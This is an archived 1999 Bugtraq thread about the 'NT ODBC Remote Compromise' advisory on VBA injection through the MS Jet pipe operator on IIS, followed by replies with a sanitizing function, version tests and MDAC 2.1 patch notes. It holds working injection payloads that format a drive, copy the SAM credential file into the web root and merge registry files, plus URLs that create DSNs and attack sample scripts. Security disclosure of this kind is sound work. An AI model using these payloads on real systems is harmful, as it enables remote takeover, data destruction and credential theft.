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Tue, 25 May 1999 13:59:30 -05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.rain.forest.puppy. &lt;rfp@WIRETRIP.NE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Advisory: NT ODBC Remote Comprom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Advisory: NT ODBC Remote Comprom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By Matthew Astley      [RCPS]        http://www.fruitcake.demon.co.u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 &amp; Rain Forest Puppy   [WireTrip]    rfp@wiretrip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Brief Summ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S Jet database engine (which runs Access databases) allows an individ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embed VBA in string expressions, which may allow the individual to r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andline NT commands.  This, combined with the flaw of IIS running ODB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ands as system_local allow a remote attacker to have full control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ystem.  Other webservers may be affected.  Many MS Jet engine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fected, but may not lead to elevated priviled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Back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C allows a program flexible access to one or more relational databa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ing SQL. If a client fails to quote correctly the meta characters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ce of data used in an SQL query, an attacker may be able to interf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 tables in the database (see MS SQL appension 'feature' in Phr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4, article 8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ever, the Microsoft "Jet" database engine (aka MS Access) provides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tensions to SQL which allow the execution of VBA (Visual Basic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cations). This makes holes in meta character quoting code much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esting and dangero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What form does the hole tak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SQL, strings must be enclosed in single quotes. If a string include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gle quote it must be escaped by doubling it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Jet engine extends this by allowing strings to enclose a VB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ression inside vertical bar characters in the string, like thi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elect 'lil'' string | 6+7 | with number' as foo from tabl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will produce a recordset containing one field with the value "lil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ing 13 with number" for each row of the input table. Innocent enoug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CGI or ASP programs correctly quote the incoming d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ever, since the pipe operator is a rather obscure character and is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orly documented, most people don't know it's there - apparently e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rosoft programm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It's a feature, not a bug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 the following excerpt from a MS Knowledge Base artic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http://support.microsoft.com/support/kb/articles/q147/6/87.asp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pe Character or Vertical B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e pipe character or vertical bar is a reserved character for the J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base engine. It tells the Jet database engine to evaluat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ier before evaluating the rest of the expression. Therefore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t database engine inserts the value of the identifier in the express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n evaluates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Vertical bars are used most often in domain aggregate functions whe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t the function to automatically recalculate the value it return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ters. Or vertical bars are used as an alternative to the ampersand (&amp;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or when you concatenate text values. Because of this, you can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bed the vertical bar (|) in a literal string, you must embed the Chr(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. Chr(124) is the vertical b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Where does it appl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textual data included in a Jet SQL query can contain quoted VB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ther it is in data to be inserted in a new record or part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dition expression. This makes the hole very general (or flexible,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prefer), since you don't need to know the context in which the st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be evalu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What commands are availabl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iggest restriction is that the code must be evaluated in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ression context - no statem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thing listed as "VBA" in the "Functions Reference" page of the Acc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 file will work, although this seems to vary between version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t engine - for example, in some cases the "eval" function works an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s it doesn't (although when it is available, eval doesn't act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 much because the |...| operator offers a similar if not ident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x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ost useful command is "shell", although this in itself cannot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irections or pipes - cmd.exe can assist with this though.  By us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ll function and running cmd.exe, an attacker can run any command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viron() can also be useful to get environment variables values into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ands, and chr() can be very handy for quoting awkward characters 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phanumerics and brackets. There are also the standard functions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f() and various string operations (use "&amp;" for concatenatio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would be very difficult to include any kind of loop in the VBA frag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ause loops do not have return valu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Which characters need quoting, and how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exploit string will be passing through anything that trie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cape special characters then ' will be double up - best to use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onically, the vertical bar character can only be escaped by using i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aluate the chr(124) fun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BA will take pairs of double-quotes (") in a VBA string constant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y SQL will take pairs of single-quotes. If this doesn't seem to work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always use chr(34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P also provides a convenient debugging aid - if the expression canno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ctly evaluated the error message will often include the whole SQ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ry with the partially decoded exploit string in it--this could help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acker 'tweak' the exploit string until it wor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command needs to be broken up with newlines, they can be inser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ween VBA operators inside the |...| constru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How about a practical exampl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xample of a pipelin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|shell("cmd /c echo " &amp; chr(124) &amp; " format a:")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format whatever is in the floppy drive at the time. Any errors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silently ignored, although an iconised window will take the focu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uration of the comm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ing "cmd /c" allows the command piping necessary to get a newline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rmat command, otherwise the pipe and 'format' are passed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guments to 'echo'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tring can be included in anything from a simple ODBC operation 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xt item in an ASP form on a web page. The function will norm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aluate to a two or three digit numb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ore sophie's-stick-ate-it example involves grabbing a copy of the SA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|shell("cmd /c rdisk /S-")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|shell("cmd /c copy c:\winnt\repair\sam._ c:\inetput\wwwroot")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** this example includes assumptions about the location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** system and www publishing directory; it's only an exam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ands can be stack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|shell("cmd /c echo 1 &gt; %temp%\foo.txt") &amp; shell("cmd /c echo 2 \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&gt;&gt; %temp%\foo.txt") &amp; shell("cmd /c echo 3 &gt;&gt; %temp%\foo.txt")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** line broken for cla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is not clear that the commands will always be executed in order.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ll command executes asynchronously so the code above has two race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ther the shell commands finish updating the file before the next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s - results will be vari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Could an attacker modify registry key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timately the hole allows anything since you can up/download and run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e, but modifying registry keys from VBA seems to be a little tric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ethod using advapi32.dll won't work because it requires statement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e functions from the library, but there doesn't seem to be a wa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ing a statement a return value in VB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would be easier to create a temporary .reg file and then merge it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md /c regedit /s %temp%\tmp.reg"; the '/s' is important, as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resses the informational dialogs/window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What permissions will an attacker hav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angerous part comes from a context misinterpretation with IIS.  I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ns as system_local; it changes its token context (typically to IUSR_xx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filesystem access and application execution.  However, the cont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es *NOT* change when interfacing with the ODBC API.  Therefore all ODB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s (and the associated database calls) are happening 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_local.  This allows full access to the sys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Theory of exploi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roblem can be used over the web against scripts that make que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ainst local MS Jet ODBC DSNs, therefore, any script or applicatio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s a MS Jet ODBC DSN could potentially be exploited.  The solution i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use MS Jet ODBC drivers for any DSN--until Microsoft releases a fi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since this is a documented feature, there stands a chance that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cations may break if remo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Reality of exploi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, so let's get down to some nitty-gritty, real-life examples.  We'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 a few that just demonstrate the problem....but since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ript/application that gives user entered strings to the MS Jet ODBC DS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vulnerable, we're not going to laundry-list them; rather, we'll s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 of the more common cases we f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Importance of the DS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 some really quick background on ODBC &amp; DSNs: an appl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'connects' to the ODBC service specifying a specific DSN to query to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SNs are defined in the ODBC32 applet of the control panel.  Each DSN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ally a description of the name of the DSN, the drivers to use (in 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e, the MS Jet/Access drivers), and location of the actual database (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mdb file somewhere in the filesystem).  We could also have DSNs that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vers such as Oracle or MS Sql, and the location would be an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er.  The whole point is that you only need to know the DSN name--ODB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take care of where and how the actual database is to be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, great, these scripts query a DSN by name.  Well, there are time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erver can have the scripts we mention, but when ran, you get an err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ing DSN is not found.  So now what?  Well, if it's an IIS server, c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the existance of /scripts/tools/newdsn.exe.  Yes, IIS includes CG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ations *to make DSNs*.  If the server doesn't have the DSN we ne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can just make it for them.  We only need newdsn.exe, but it's possi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use a 'GUI' through getdrvrs.exe and dsnform.exe.  Here's a flowchar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ttp://server/scripts/tools/getdrvrs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&gt; pick Microsoft Access Driver (*.mdb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&gt; Enter in the correct DSN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&gt; Enter a location for the .mdb, example: c:\web.md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&gt; Subm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will create the DSN.  If you want to be ultra-elite and do i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 way, you can pass all the parameters to newdsn.exe like s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ttp://server/scripts/tools/newdsn.exe?driver=Microsoft%2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ccess%2BDriver%2B%28*.mdb%29&amp;dsn=DSN_name&amp;dbq=c:\web.mdb&amp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ewdb=CREATE_DB&amp;attr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**all one line, no spa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dsn is the name you want, and dbq is the file location.  So for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xamples, we'll include the DSN name, just in case you have to cre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IIS Sample Applic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ording to Russ Cooper of NTBugtraq, sample application problem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pid and we shouldn't waste our time talking about them.  He's alrea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ied posts from myself, David Litchfield, and others.  So, if you li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Russ's little world, you won't have any of the following sample ap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ed on your server, so you should just stop reading this artic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ght now.  But for those of you who realize it's just not that simp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haps you can learn something here.  Also note this goes beyond sam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ripts--they're just being used as a command reference exam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ways, a good example scrip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ttp://server/scripts/samples/details.idc?Fname=&amp;Lname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ck your shellcode in for either Fname or Lname, like s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etails.idc?Fname=hi&amp;Lname=|shell("cmd+/c+dir")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uses DSN named "Web SQL" (notice the space).  However, this cau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ems, because the actual table must be initialized in the DSN.  N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eer, scripts are here!  R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ttp://server/scripts/samples/ctguestb.id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you create the DSN (if you had to) and before you run details.id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MSADC (IIS 4.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ing with IIS 4.0, Microsoft bundled a way to do remote SQL querie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SN simply by interfacting via HTTP to a specific .dll.  Bug?  Hol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pe, in the documentation Microsoft states that having MSADC insta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ld lead to security proble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articular .dll is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ttp://server/msadc/msadcs.d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the particular problem is that there's a slightly custom wa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face to the .dll, using multipart-forms.  So it's beyond the scop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 typing in a paramter by hand.  So there's two op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is to see if the server also has the (optional) interface instal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out for the existanc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ttp://server/msadc/samples/adctest.as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** Note: you have to use Internet Explorer 4.0+ for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will give you a Java/Javascript interface that allows you to specif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SN, uid/password, and SQL string to execute.  Note that you'll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obtain the table structure for the DSNs mentioned herein, be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ll need to construct a valid SQL state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ther option is to obtain those files yourself from another server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load and install the MS RDS/ADO/ADC components.  Look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ttp://www.microsoft.com/data/ado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more info and where to downlo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 One note is that the Java interface lets you specify which serve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.  So you can open the interface locally, off your own server, or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on server 1, and specify to run SQL commands against whatever DSN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er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ne caveat is that error information is not displayed.  It help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a sniffer going to see if what ODBC error messages are returned,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.  If you don't get a record listing, you might want to see w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ror w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, what to d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n obviously just execute SQL commands that contain the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acter.  For instanc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onnection: DSN=AdvWo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Query: Select * from Products where ProductType='|shell("")|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** Insert your shellcode in the shell() fun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Sign-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, I'm sure that's enough to chew for a bit.  Sorry, the examp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n't as in-depth as usual--you'll just have to be satisfie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ory. :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thew Astley [RCPS] http://www.fruitcake.demon.co.u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rain.forest.puppy. [WireTrip] rfp@wiretrip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many thanks to Matthew for working on this project together. :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greetings to (#!)ADM, (#)Rhino9, and Phr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special thanks to joewee &amp; antilove for giving me a hard time; stran9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for all the fun chats and setting me straight; and everyone else I forg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before these greets become longer than the advisory. :) Oh, and el8.org ro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[ This advisory is ISO 31337 certified.  Fact of life: ADM &gt;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Tue, 25 May 1999 22:00:42 +0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Vittal Aithal &lt;vittal.aithal@REVOLUTIONLTD.COM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Advisory: NT ODBC Remote Comprom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[ The following text is in the "iso-8859-1" character set.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[ Your display is set for the "US-ASCII" character set.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[ Some characters may be displayed incorrectly.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's some javascript stuff that'll clean up quotes and things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ing them sent off in a sql query... only tested with access, so YMM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function cleanSql (str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ar newStr = "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r = "" + str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ar oneChar = (str.length == 1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f (str.length == 0) { return "null"; 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 (var i = 0; i &lt; str.length; i++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var repStr = "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f (str.charAt(i) == "'") { newStr += "''"; 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lse if (str.charAt(i) == "|") { repStr = 124; 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lse if (str.charAt(i) == "\"") { repStr = 34; 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lse { newStr += str.charAt(i); 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f (repStr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f (i == 0 &amp;&amp; !oneChar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ewStr += "CHR(" + repStr + ") &amp;'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} else if (i == str.length - 1 &amp;&amp; !oneChar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ewStr += "' &amp; CHR(" + repStr + ")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} else if (!oneChar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ewStr += "' &amp; CHR(" + repStr + ") &amp; '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} else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ewStr += "CHR(" + repStr + ")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f (!repStr &amp;&amp; i == 0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ewStr = "'" + newStr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f (!repStr &amp;&amp; i == str.length - 1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ewStr += "'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turn newStr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elegant, but it does work, and stop |'s getting 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t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ttal Aith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olution Ltd &lt;tel: 0181 267 1000&gt; &lt;fax: 0181 267 1066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vittal.aithal@revolutionltd.com&gt; &lt;http://www.revolutionltd.com/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vittal.aithal@bigfoot.com&gt; &lt;http://www.bigfoot.com/~vittal.aithal/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Tue, 25 May 1999 14:43:25 -07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Bigby Findrake &lt;bigby@HOME.SHIVA.EU.ORG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Advisory: NT ODBC Remote Comprom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ue, 25 May 1999, Vittal Aithal wro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Here's some javascript stuff that'll clean up quotes and things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having them sent off in a sql query... only tested with access, so YMM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keep in mind that while this will stop people from us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orementioned exploits *only when using your forms*.  It is s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sible to download your web pages, remove the javascript hooks, and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mit their information, or call the CGI(if method GET is accepted)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 and get around such security measur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Wed, 26 May 1999 09:01:26 +0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Vittal Aithal &lt;vittal.aithal@REVOLUTIONLTD.COM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Advisory: NT ODBC Remote Comprom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 to clarify my earlier posting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de I posted was server-side ASP Javascript. As a number of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/will point out, running it at the client isn't going to hel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uspect the same methodology could be applied for other environ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oldfusion / perl DBI::DBD / php / etc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t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Wed, 26 May 1999 18:56:05 +0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Bronek Kozicki &lt;bronek@wpi.com.pl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Advisory: NT ODBC Remote Comprom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ve run some testing. Seems to me that this error has been repair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SJET40, but exists in MSJET35. Effectively, if Jet 4 is installed (and i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d by ODBC) ther's no problem with .IDC files. If one does not have Jet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s using .IDC to open Jet databases (I have not verified this) I bel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dangerous situation, described by Matthew Astle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ause MS Access 97 is using Jet 3.5 (even if Jet 4 is installed)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em still can be seen t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nstead of .IDC (which is considered obsolete) one is using .ASP + ADODB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DODB provider used is "Microsoft.Jet.OLEDB.3.51"  (i.e. older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4.0") then problem still exis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worthy to notice that SQL implementation used in both Jet 4 and Jet 3.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little different. Thus applications (in some situations) cannot be sim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ted from one to another. One thing I found is different handling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gle- and double-qoute character. MS still have not documented differen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or I had no luck to find it). AFAIK MS Jet 4 comes with  Microsoft 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ess 2.1 (MSDAC21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ail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: WinNT Wrkst 4 US, SP5 , IE5 , IIS 4 (Option Pack), ODBC MS Acc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ver 4.00.3513.00, other (cursor library, administrator etc.) ODBC f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10.371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base: Access 97, Jet 3.51.2026.0 (I have also Jet 4.00.2115.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ed, but Access 97 uses older vers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ble "guests" as described in Web SQ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ry "SecurityTest" as bellow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ELECT FirstName, LastName FROM Guests WHERE LastName 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'|Shell("notepad.exe",1)|'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happe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f I open the query under MS Access, it opens Notepad app and show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empty) resultset. So far mentioned SQL "feature" wor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f I use MSQRY32.EXE to open the database (), nothing more happen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wing the resultset (empty one).  The same if I run SQRY32 from within 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cel ("Get Externala Data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 created TEST.IDC file as bellow (and TEST.HTX, of course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source: Web SQ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rname: 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plate: details.ht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QLStatemen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SELECT FirstName, Last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FROM SecurityT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pened it through HTTP. The only result is an empty resultset. I chec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of processes (using TLIST.EXE) and notepad was not r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 created TEST2.IDC file as bellow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source: Web SQ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rname: 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plate: details.ht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QLStatemen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SELECT FirstName, Last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FROM Gue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WHERE LastName &lt;&gt; '|Shell("notepad.exe",1)|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ame. Notepad did not r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 created very simple .AS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TML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A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m = Request.QueryString("Param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= Request.QueryString("Data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HEA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BODY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Conn1 = CreateObject("ADODB.Connection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'strConn = "Provider=Microsoft.Jet.OLEDB.3.51;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rce=c:\temp\test.mdb;Mode=Read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Conn = "Provider=Microsoft.Jet.OLEDB.4.0;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rce=c:\temp\test.mdb;Mode=Read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SQL = "SELECT FirstName , LastName FROM SecurityTest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n1.Open strCon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RSet1 = Conn1.Execute(strSQ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Set1.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n1.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BODY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HTML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that there are 2 connection strings, one is used and the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ented out. Upper connection string ("Provider=Microsoft.Jet.OLEDB.3.51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UNSAFE. When I opened .ASP it started NOTEPAD.EXE in the context of  WW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er. If WWW client can type-in any literal into HTML form, pass i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ASP application (for exaple to be used in "WHERE" clause) and it rem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-parsed, then he/she will be able to run ANY code in the contex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lSystem. If such a WWW server is also domain controller ... well, I'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t scared to think about. Lower connection st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"Provider=Microsoft.Jet.OLEDB.4.0") seems to be sa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ope somebody can verify my tests. Most important point is that while .ID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s are using current ODBC it strongly depends on configuration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. If Jet 4 is installed and is used by ODBC, we are safe.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es to .ASP + ODBC. On the other side is .ASP + ADODB, where Jet eng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be explicitly selected. If Jet older than 4 is used then we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gerous situation. Fortunately in .ASP we can easily parse strings pa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from WWW client (like Vittal Aithal did in JavaScript, but function w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n on the server sid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a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nek Kozic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Q UID: 25404796            PGP KeyID: 0x4A30FA9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EE 10E6 978C 6B33 5208  094E BD61 9067 4A30 FA9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-----Original Message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From: Bugtraq List [mailto:BUGTRAQ@NETSPACE.ORG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Sent: Tuesday, May 25, 1999 9:00 P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Subject: Advisory: NT ODBC Remote Comprom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--[ Advisory: NT ODBC Remote Comprom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--[ By Matthew Astley      [RCPS]        http://www.fruitcake.demon.co.u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--[  &amp; Rain Forest Puppy   [WireTrip]    rfp@wiretrip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--[ Brief Summ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MS Jet database engine (which runs Access databases) allows an individ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to embed VBA in string expressions, which may allow the individual to r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commandline NT commands.  This, combined with the flaw of IIS running ODB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commands as system_local allow a remote attacker to have full control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the system.  Other webservers may be affected.  Many MS Jet engine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affected, but may not lead to elevated priviled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's something that does not work for me. ODBC is not using Jet "featur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n embed VBA expression. It seems to use different database eng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--[ Back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ODBC allows a program flexible access to one or more relational databa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using SQL. If a client fails to quote correctly the meta characters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piece of data used in an SQL query, an attacker may be able to interf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with the tables in the database (see MS SQL appension 'feature' in Phr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54, article 8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's true, but not connected to the subject. Attacker seems not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t, while "feature" exists just there. At least on my sys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However, the Microsoft "Jet" database engine (aka MS Access) provides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extensions to SQL which allow the execution of VBA (Visual Basic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Applications). This makes holes in meta character quoting code much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 interesting and dangero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's tr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cut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Thu, 27 May 1999 15:48:48 -04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Russ &lt;Russ.Cooper@RC.ON.CA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NTBUGTRAQ@LISTSERV.NTBUGTRAQ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Advisory: NT ODBC Remote Comprom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ve had 2 individuals suggest that MDAC 2.1 solves the probl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bed by rfp@wiretrip.net regarding NT ODBC and Access. Ther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so another message on Bugtraq suggesting the same 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ryl Banttari [daryl@windsorcs.com] reports that Allaire's ColdFu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uct is vulnerable to the same attack when using Access datasourc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appears not to be vulnerable after installing MDAC 2.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ould put a direct link here to MDAC 2.1, but the fact is tha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not simply upgrade to it without understanding what it chan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nd what effect those changes may have on your existing environmen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instead, I give you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www.microsoft.com/data/MDAC21info/MDAC21GAmanifest.ht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has a ton of information about the MDAC 2.1 rele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s - NTBugtraq Edi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Thu, 27 May 1999 17:20:45 -05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Jesper M. Johansson &lt;jesper.m.johansson-1@UMN.EDU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NTBUGTRAQ@LISTSERV.NTBUGTRAQ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Advisory: NT ODBC Remote Comprom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I could put a direct link here to MDAC 2.1, but the fact is tha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should not simply upgrade to it without understanding what it chan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(and what effect those changes may have on your existing environmen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So instead, I give you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http://www.microsoft.com/data/MDAC21info/MDAC21GAmanifest.ht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are using Excel data sources and are updating data in them you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t to keep in mind that upgrading to MDAC 2.1 will break those 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rces. MDAC 2.1 no longer supports the update method for Excel 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rces. This will, for example, cause Cold Fusion to access violat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ten causes crashes in InetSrv.exe if you are using IIS. Unfortunately, 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got to mention that in the document Russ pointed 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s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sper.M.Johansson-1@umn.ed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.D. Candidate, University of Minneso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itor, SANS NT Dig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SE , MCP +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ids.csom.umn.edu/jes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Juris Praecepta sunt haec: honeste vive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erum non laedere, suum cuique tribuer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Ulp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